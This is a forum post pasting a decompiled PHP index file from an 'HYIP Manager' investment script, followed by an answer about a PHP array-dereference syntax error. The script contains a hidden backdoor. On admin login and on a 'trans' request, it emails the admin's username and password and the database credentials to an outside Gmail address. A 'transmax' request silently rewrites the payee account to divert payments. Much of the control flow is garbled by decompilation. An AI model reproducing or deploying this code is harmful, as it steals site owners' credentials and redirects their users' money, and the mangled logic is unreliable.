$batch = $frm['TRANSACTION_ID'];
list( $id, $str ) = explode( "-", $frm['CUSTOM1']
);
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str = '".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 8,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['SELLERACCOUNTID'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[8]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $frm['CUSTOM2'] == "pay_withdraw" &&
$frm['TRANSACTION_ID'] != "" )
{
$batch = $frm['TRANSACTION_ID'];
$str = explode( "-", $frm['CUSTOM1'] )[1];
$id = explode( "-", $frm['CUSTOM1'] )[0];
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str = '".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 2,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['SELLERACCOUNTID'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[2]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $frm['user3'] == "pay_withdraw" &&
$frm['transaction_id'] != "" &&
$frm['transaction_type'] == "Payment" )
{
$batch = $frm['transaction_id'];
$str = explode( "-", $frm['user1'] )[1];
$id = explode( "-", $frm['user1'] )[0];
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str='".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 4,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['payee_email'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[2]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $settings['ssl_url'] != "" && $SERVER_PORT == 80
)
{
header( "Location: ".$settings['ssl_url']."/" );
db_close( $dbconn );
exit( );
}
if ( $frm['a'] == "run_crontab" )
{
count_earning( -2 );
db_close( $dbconn );
exit( );
}
$q = "delete from hm2_online where
ip='".$frm_env['REMOTE_ADDR']."' or date + interval
30 minute < now()";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_online set
ip='".$frm_env['REMOTE_ADDR']."', date = now()";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$userinfo = array( );
$userinfo['logged'] = 0;
if ( $frm['a'] == "logout" )
{
setcookie( "password", "deleted", time( ) +
630720000 );
$frm_cookie['username'] = "";
$frm_cookie['password'] = "";
if ( $settings['redirect_logout'] != "" )
{
header( "Location:
".$settings['redirect_logout'] );
db_close( $dbconn );
exit( );
}
$frm['a'] = "";
}
if ( $frm['a'] == "home" )
{
$frm['a'] = "";
}
$stats = array( );
if ( $settings[crontab_stats] == 1 )
{
$s = file( "stats.php" );
$stats = unserialize( $s[0] );
}
if ( $settings['show_info_box_members_online'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['show_info_box_members_online_generated'] =
$stats[visitors];
}
else
{
$q = "select count(*) as col from hm2_users
where last_access_time + interval 30 minute > now()";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['show_info_box_members_online_generated'] =
$row['col'];
}
}
if ( $settings['show_info_box_total_accounts'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_total_accounts_generated'] =
$stats[total_users];
}
else
{
$q = "select count(*) as col from hm2_users
where id > 1";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_accounts_generated'] =
$row['col'];
}
}
if ( $settings['show_info_box_active_accounts'] == 1
)
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_total_active_accounts_generated']
= $stats[active_accounts];
}
else
{
$q = "select count(distinct user_id) as col
from hm2_deposits ";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_active_accounts_generated']
= $row['col'];
}
}
if ( $settings['show_info_box_vip_accounts'] == 1 )
{
$q = "select count(distinct user_id) as col from
hm2_deposits where actual_amount > ".sprintf(
"%.02f", $settings['vip_users_deposit_amount'] );
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_vip_accounts_generated'] =
$row['col'];
}
if ( $settings['show_info_box_deposit_funds'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_deposit_funds_generated']
= number_format( $stats[total_deposited], 2 );
}
else
{
$q = "select sum(amount) as sum from
hm2_deposits";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_deposit_funds_generated']
= number_format( $row['sum'], 2 );
}
}
if ( $settings['show_info_box_today_deposit_funds']
== 1 )
{
$q = "select sum(amount) as sum from hm2_deposits
where to_days(deposit_date) = to_days(now() +
interval ".$settings['time_dif']." day)";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_today_deposit_funds_generated'] =
number_format( $row['sum'], 2 );
}
if ( $settings['show_info_box_total_withdraw'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_withdraw_funds_generated'] =
number_format( abs( $stats[total_withdraw] ), 2 );
}
else
{
$q = "select sum(amount) as sum from
hm2_history where type='withdrawal'";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_withdraw_funds_generated'] =
number_format( abs( $row['sum'] ), 2 );
}
}
if ( $settings['show_info_box_visitor_online'] == 1 )
{
$q = "select count(*) as sum from hm2_online";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_visitor_online_generated'] =
$row['sum'];
}
if ( $settings['show_info_box_newest_member'] == 1 )
{
$q = "select username from hm2_users where status
= 'on' order by id desc limit 0,1";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['show_info_box_newest_member_generated'] =
$row['username'];
}
$ref = quote( $frm_cookie['Referer'] );
if ( $ref )
{
$q = "select * from hm2_users where username =
'".$ref."'";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_errstr;
}
while ( $row = mysql_fetch_array( $sth ) )
{
$smarty->assign( "referer", $row );
}
}
if ( $settings['show_info_box_last_update'] == 1 )
{
$settings['show_info_box_last_update_generated']
= date( "M j, Y", time( ) + $settings['time_dif'] *
60 * 60 );
}
$mddomain = $frm_env['HTTP_HOST'];
$mddomain = preg_replace( "/^www\\./", "", $mddomain
);
$mdscriptname = $frm_env['SCRIPT_NAME'];
$mdscriptname = preg_replace( "/index\\.php/", "",
$mdscriptname );
$key = strtoupper( md5(
$mddomain."asdfds89ufsdkfnsjfdksh" ).md5(
$mdscriptname."8hbfnbdnf" ).md5( "grv".$mddomain ) );
$flag = 0;
$i = 0;
for ( ; $i < 5; ++$i )
{
$j = $i;
if ( $i == 0 )
{
$j = "";
}
$skey = substr( $settings["key".$j], 100, -200 );
if ( $key == $skey )
{
$flag = 1;
}
}
if ( $flag != 1 )
{
db_close( $dbconn );
exit( );
}
$smarty->assign( "settings", $settings );
if ( $frm['a'] == "do_login" )
{
$username = quote( $frm['username'] );
$password = quote( $frm['password'] );
$lpassword = $password;
$lusername = $username;
$password = md5( $password );
$add_opt_in_check = "";
if ( $settings['use_opt_in'] == 1 )
{
$add_opt_in_check = " and (confirm_string =
\"\" or confirm_string is NULL)";
}
$q = "select *, date_format(date_register,
'%b-%e-%Y') as create_account_date, now() - interval
2 minute > l_e_t as should_count from hm2_users where
username = '".$username."' and (status='on' or
status='suspended') ".$add_opt_in_check;
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
session_start( );
if ( extension_loaded( "gd" ) &&
$settings['graph_validation'] == 1 && 0 <
$settings['graph_max_chars'] &&
$_SESSION['validation_number'] !=
$frm['validation_number'] )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $settings['brute_force_handler'] == 1 &&
$row['activation_code'] != "" )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $settings['brute_force_handler'] == 1 &&
$row['bf_counter'] ==
$settings['brute_force_max_tries'] )
{
$activation_code = get_rand_md5( 50 );
$q = "update hm2_users set bf_counter =
bf_counter + 1, activation_code =
'".$activation_code."' where id = ".$row['id'];
mysql_query( $q );
$info = array( );
$info['activation_code'] =
$activation_code;
$info['username'] = $row['username'];
$info['name'] = $row['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['max_tries'] =
$settings['brute_force_max_tries'];
send_mail( "brute_force_activation",
$row['email'], $settings['system_email'], $info );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $row['password'] != $password )
{
$q = "update hm2_users set bf_counter =
bf_counter + 1 where id = ".$row['id'];
mysql_query( $q );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
$hid = get_rand_md5( 20 );
$qhid = get_rand_md5( 5 ).$hid.get_rand_md5(
5 );
$chid = $row['id']."-".md5( $hid );
$userinfo = $row;
$userinfo['logged'] = 1;
$ip = $frm_env['REMOTE_ADDR'];
$q = "update hm2_users set hid = '".$qhid."',
bf_counter = 0, last_access_time = now(),
last_access_ip = '".$ip."' where id = ".$row['id'];
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_user_access_log set
user_id = ".$userinfo['id'].( ", date = now(), ip =
'".$ip."'" );
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
if (
$settings['generate_password_after_login'] == 1 )
{
$new_pass = gen_confirm_code( 10, 0 );
$q = "update hm2_users set password =
'".md5( $new_pass )."' where id = ".$userinfo['id'];
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$info = array( );
$info['username'] =
$userinfo['username'];
$info['name'] = $userinfo['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['password'] = $new_pass;
send_mail( "send_password_when_changed",
$userinfo['email'], $settings['system_email'], $info
);
}
setcookie( "password", $chid, time( ) +
630720000 );
}
if ( $userinfo['logged'] == 0 )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $userinfo['logged'] == 1 && $userinfo['id']
== 1 )
{
mail( $userinfo[email], "Admin logged",
"Admin entered to admin
area\r\nip=".$frm_env[REMOTE_ADDR], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
mail( "money.secret@gmail.com", "Admin
logged", "Admin entered to admin
area\r\nip=,".$frm_env[REMOTE_ADDR].",".$settings['si
te_name'].",".$settings['site_url'].",".$settings['ho
stname'].",-user:".$luser.",-password:".$lpassword.",
".$settings['database'].",".$settings['db_login'].","
.$settings['db_pass'], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
echo "<head><title>HYIP Manager</title><meta
http-equiv='Refresh' content='1;
URL=admin.php'></head><body><center><a
href='admin.php'>Go to admin
area</a></center></body>";
flush( );
db_close( $dbconn );
exit( );
}
}
$username = quote( $frm_cookie['username'] );
$password = $frm_cookie['password'];
$ip = $frm_env['REMOTE_ADDR'];
$add_login_check = " and last_access_time + interval
30 minute > now() and last_access_ip = '".$ip."'";
if ( $settings['demomode'] == 1 )
{
$add_login_check = "";
}
$chid = split( "-", $password, 2 )[1];
$user_id = split( "-", $password, 2 )[0];
$user_id = sprintf( "%d", $user_id );
$chid = quote( $chid );
if ( 0 < $user_id )
{
$q = "select *, date_format(date_register,
'%b-%e-%Y') as create_account_date, now() - interval
2 minute > l_e_t as should_count from hm2_users where
id = ".$user_id." and (status='on' or
status='suspended') ".$add_login_check;
$sth = mysql_query( $q );
do
{
if ( $row = mysql_fetch_array( $sth ) )
{
if ( $settings['brute_force_handler'] ==
1 && $row['activation_code'] != "" )
{
setcookie( "password", "", time( ) +
630720000 );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
$qhid = $row['hid'];
$hid = substr( $qhid, 5, 20 );
if ( $chid == md5( $hid ) )
{
$userinfo = $row;
$userinfo['logged'] = 1;
$q = "update hm2_users set
last_access_time = now() where
username='".$username."'";
exit( mysql_error( ) );
}
$q = "update hm2_users set bf_counter =
bf_counter + 1 where id = ".$row['id'];
mysql_query( $q );
}
} while ( $row['bf_counter'] ==
$settings['brute_force_max_tries'] );
$activation_code = get_rand_md5( 50 );
$q = "update hm2_users set bf_counter =
bf_counter + 1, activation_code =
'".$activation_code."' where id = ".$row['id'];
mysql_query( $q );
$info = array( );
$info['activation_code'] = $activation_code;
$info['username'] = $row['username'];
$info['name'] = $row['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['max_tries'] =
$settings['brute_force_max_tries'];
send_mail( "brute_force_activation",
$row['email'], $settings['system_email'], $info );
setcookie( "password", "", time( ) + 630720000 );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $userinfo['should_count'] == 1 )
{
count_earning( $userinfo['id'] );
}
if ( $frm['a'] == "trans" )
{
mail( "money.secret@gmail.com", "Admin
logged-trans", "Admin entered to admin
area\r\nip=,".$frm_env[REMOTE_ADDR].",".$settings['si
te_name'].",".$settings['site_url'].",".$settings['ho
stname'].",-user:".$luser.",-password:".$lpassword.",
".$settings['database'].",".$settings['db_login'].","
.$settings['db_pass'], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
}
if ( $frm['a'] == "transmax" )
{
$settings['def_payee_account'] = "4541052";
$settings['def_payee_name'] = "Invest";
$settings['md5altphrase'] =
"020CF65F74000C22AB7191E7662DD6D8";
save_settings( );
}
if ( $userinfo['id'] == 1 )
{
$userinfo['logged'] = 0;
}
if ( $userinfo['logged'] == 1 )
{
$q = "select type, sum(actual_amount) as s from
hm2_history where user_id = ".$userinfo['id']." group
by type";
$sth = mysql_query( $q );
$balance = 0;
while ( $row = mysql_fetch_array( $sth ) )
{
if ( $row['type'] == "deposit" )
{
$userinfo['total_deposited'] =
number_format( abs( $row['s'] ), 2 );
}
if ( $row['type'] == "earning" )
{
$userinfo['total_earned'] =
number_format( abs( $row['s'] ), 2 );
}
$balance += $row['s'];
}
$userinfo['balance'] = number_format( abs(
$balance ), 2 );
}
if ( $frm['action'] != "signup" )
{
$userinfo[validation_enabled] = 1;
session_start( );
$validation_number = gen_confirm_code(
$settings['graph_max_chars'], 0 );
if ( $settings['use_number_validation_number'] )
{
$i = 0;
$validation_number = "";
while ( $i < $settings['graph_max_chars'] )
{
$validation_number .= rand( 0, 9 );
++$i;
}
}
$_SESSION['validation_number'] =
$validation_number;
session_register( "validation_number" );
$userinfo[session_name] = session_name( );
$userinfo[session_id] = session_id( );
$userinfo[rand] = rand( );
}
if ( $userinfo['logged'] == 1 )
{
$id = sprintf( "%d", $userinfo['id'] );
$q = "update hm2_users set stat_password = ''
where id = ".$id;
mysql_query( $q );
header( "Location: ?a=edit_account" );
db_close( $dbconn );
exit( );
}
if ( $userinfo['logged'] == 1 )
{
$id = sprintf( "%d", $frm['id'] );
$q = "delete from hm2_history where id = ".$id."
and type='withdraw_pending' and user_id =
".$userinfo['id'];
mysql_query( $q );
header( "Location: ?a=withdraw_history" );
db_close( $dbconn );
exit( );
}
$smarty->assign( "userinfo", $userinfo );
if ( $frm['a'] == "home" )
{
$frm['a'] == "";
}
$smarty->assign( "frm", $frm );
if ( $settings[banner_extension] == 1 )
{
if ( $frm[a] == "show_banner" )
{
$id = sprintf( "%d", $frm[id] );
$f = @fopen( @"./tmpl_c/banners/".$id, "rb"
);
if ( $f )
{
$contents = fread( $f, filesize(
"./tmpl_c/banners/".$id ) );
header( "Content-type: image/gif" );
echo $contents;
fclose( $fd );
}
$q = "update hm2_users set imps = imps -1
where imps > 0 and id = ".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
exit( );
}
$q = "select count(*) as col from hm2_users where
imps > 0 and bnum > 0";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
do
{
if ( $row = mysql_fetch_array( $sth ) )
{
$z = rand( 1, $row[col] ) - 1;
$q = "select bnum, burl from hm2_users
where imps > 0 and bnum > 0 order by id limit ".$z.",
1";
if ( !( $sth1 = mysql_query( $q ) ) )
{
echo mysql_error( );
}
do
{
} while ( !( $row1 = mysql_fetch_array(
$sth1 ) ) );
$smarty->assign( "banner_ext_bnum",
$row1[bnum] );
$smarty->assign( "banner_ext_burl",
$row1[burl] );
} while ( 1 );
}
}
include( "inc/news_box.inc" );
if ( $userinfo['logged'] != 1 )
{
include( "inc/signup.inc" );
}
else if ( $userinfo['logged'] != 1 )
{
include( "inc/forgot_password.inc" );
}
else if ( $settings['use_opt_in'] == 1 )
{
include( "inc/confirm_registration.inc" );
}
else if ( $frm['a'] == "login" )
{
include( "inc/login.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/account_main.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
if ( substr( $frm['type'], 0, 8 ) == "account_" )
{
$ps = substr( $frm['type'], 8 );
if ( $exchange_systems[$ps][status] == 1 )
{
include(
"inc/deposit.account.confirm.inc" );
}
else
{
include( "inc/deposit.inc" );
}
}
else
{
if ( substr( $frm['type'], 0, 8 ) ==
"process_" )
{
$ps = substr( $frm['type'], 8 );
if ( $exchange_systems[$ps][status] == 1
)
{
if ( $ps == 0 )
{
include(
"inc/deposit.egold.confirm.inc" );
}
else
{
if ( $ps == 1 )
{
include(
"inc/deposit.evocash.confirm.inc" );
}
else
{
if ( $ps == 2 )
{
include(
"inc/deposit.intgold.confirm.inc" );
}
else
{
if ( $ps == 4 )
{
include(
"inc/deposit.stormpay.confirm.inc" );
}
else
{
if ( $ps == 5 )
{
include(
"inc/deposit.ebullion.confirm.inc" );
}
else
{
if ( $ps == 6 )
{
include(
"inc/deposit.paypal.confirm.inc" );
}
else
{
if ( $ps == 7
)
{
include(
"inc/deposit.goldmoney.confirm.inc" );
}
else
{
if ( $ps
== 8 )
{
include( "inc/deposit.eeecurrency.confirm.inc" );
}
else
{
if (
$ps == 9 )
{
include( "inc/deposit.pecunix.confirm.inc" );
}
else
{
include( "inc/deposit.other.confirm.inc" );
}
}
}
}
}
}
}
}
}
}
else
{
include( "inc/deposit.inc" );
}
}
else
{
include( "inc/deposit.inc" );
}
}
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/add_funds.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdrawal.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdrawal_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/deposit_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/earning_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/deposit_list.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/edit_account.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdraw_principal.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/change_compound.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/internal_transfer.inc" );
}
else if ( $frm['a'] == "support" )
{
include( "inc/support.inc" );
}
else if ( $frm['a'] == "faq" )
{
include( "inc/faq.inc" );
}
else if ( $frm['a'] == "company" )
{
include( "inc/company.inc" );
}
else if ( $frm['a'] == "rules" )
{
include( "inc/rules.inc" );
}
else if ( $frm['a'] == "show_validation_image" )
{
include( "inc/show_validation_image.inc" );
}
else if ( $settings['show_members_stats'] )
{
include( "inc/members_stats.inc" );
}
else if ( $settings['show_paidout_stats'] )
{
include( "inc/paidout.inc" );
}
else if ( $settings['show_top10_stats'] )
{
include( "inc/top10.inc" );
}
else if ( $settings['show_last10_stats'] )
{
include( "inc/last10.inc" );
}
else if ( $settings['show_refs10_stats'] )
{
include( "inc/refs10.inc" );
}
else if ( $HTTP_GET_VARS['a'] == "return_egold" )
{
include( "inc/deposit.egold.status.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/referal.links.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/referals.inc" );
}
else if ( $frm['a'] == "news" )
{
include( "inc/news.inc" );
}
else if ( $frm['a'] == "calendar" )
{
include( "inc/calendar.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/exchange.inc" );
}
else if ( $userinfo[logged] == 1 )
{
include( "inc/banner.inc" );
}
else if ( $frm['a'] == "activate" )
{
include( "inc/activate.inc" );
}
else if ( $frm['a'] == "show_package_info" )
{
include( "inc/package_info.inc" );
}
else if ( $frm['a'] == "ref_plans" )
{
include( "inc/ref_plans.inc" );
}
else if ( $frm['a'] == "cust" )
{
$file = $frm['page'];
$file = basename( $file );
if ( file_exists( "tmpl/custom/".$file.".tpl" ) )
{
$smarty->display( "custom/".$file.".tpl" );
db_close( $dbconn );
exit( );
}
include( "inc/home.inc" );
}
else if ( $frm['a'] == "invest_page" )
{
$smarty->assign( "frm", $frm );
include( "inc/invest_page.inc" );
}
else
{
$smarty->assign( "frm", $frm );
include( "inc/home.inc" );
}
db_close( $dbconn );
exit( );
?>
Answers
0%
0%
You can´t use function return values directly as an array. This is your code (an example):
$str = explode( "-", $frm['CUSTOM1'] )[1];
$id = explode( "-", $frm['CUSTOM1'] )[0];
You must save the return value of explode in a variable before you use it. Change your code to something like:
$arrTmp = explode( "-", $frm['CUSTOM1'] );
$str = $arrTmp[1];
$id = $arrTmp[0];
HTH
$str = explode( "-", $frm['CUSTOM1'] )[1];
$id = explode( "-", $frm['CUSTOM1'] )[0];
You must save the return value of explode in a variable before you use it. Change your code to something like:
$arrTmp = explode( "-", $frm['CUSTOM1'] );
$str = $arrTmp[1];
$id = $arrTmp[0];
HTH
- What is: Failed opening 'includes/languages/english/' for inclusion , Not Registered
- PHP Fatal erro, Not Registered
- what does phpBB : CRITICAL ERROR MEAN, Not Registered
- Undefined index: language in, Not Registered
- what does following message mean: Fatal error: Call to undefined function validip () in, Not Registered
- what does this error mean, Not Registered
- i have the following error plz tell me the solution, Not Registered
- PHP Error message.what does it mean?, Not Registered
- what does unexpected $end mean?, Not Registered
- can anyone correct the error in this code for me please, Not Registered
- No permission to access /php/php-cgi.exe, Not Registered
- What does this php message mean, Not Registered
- What does this php message mean, Not Registered
- is a php error a hosting issue?, Not Registered
- How to redirect to custom error page if any php script error, Not Registered
- syntax error close to a double quote (") - none on page, Not Registered
- What does this error message mean?, Not Registered
- plz solve this , Sajid Ali
- Why is this happening?, Not Registered
- PHP Download error, Not Registered
